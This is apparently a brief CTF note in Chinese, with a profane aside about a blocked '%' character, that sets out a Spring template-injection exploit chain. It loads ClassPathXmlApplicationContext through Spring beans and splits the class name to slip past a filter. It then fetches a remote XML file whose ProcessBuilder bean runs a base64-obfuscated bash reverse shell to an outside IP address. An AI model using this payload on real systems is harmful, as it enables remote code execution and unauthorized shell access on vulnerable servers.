Spring

https://tttang.com/archive/1692/
为什么我ban的是%???
你妈的,不打了,退游

{% set y= beans.get("org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory").resourceLoader.classLoader.loadClass("java.beans.Beans") %}
{% set yy =  beans.get("jacksonObjectMapper").readValue("{}", y) %}
//把下面这个类分成a+b,org.springframework.context.support.ClassPathXmlApplicationContext 
{% set a = "org.springframework.context.support"%}
{% set b = ".ClassPathXmlApplicationContext" %}
{% set yyy = yy.instantiate(null,a+b) %}
{{ yyy.setConfigLocation("https://fileserver.dionysus.zip/1.xml") }}
{{ yyy.refresh() }}

<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg >
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xNjUuMTU0LjUuMjIxLzk5OTkgMD4mMQ==|base64 -d|bash -i</value>
            </list>
            </constructor-arg>
        </bean>
    </beans>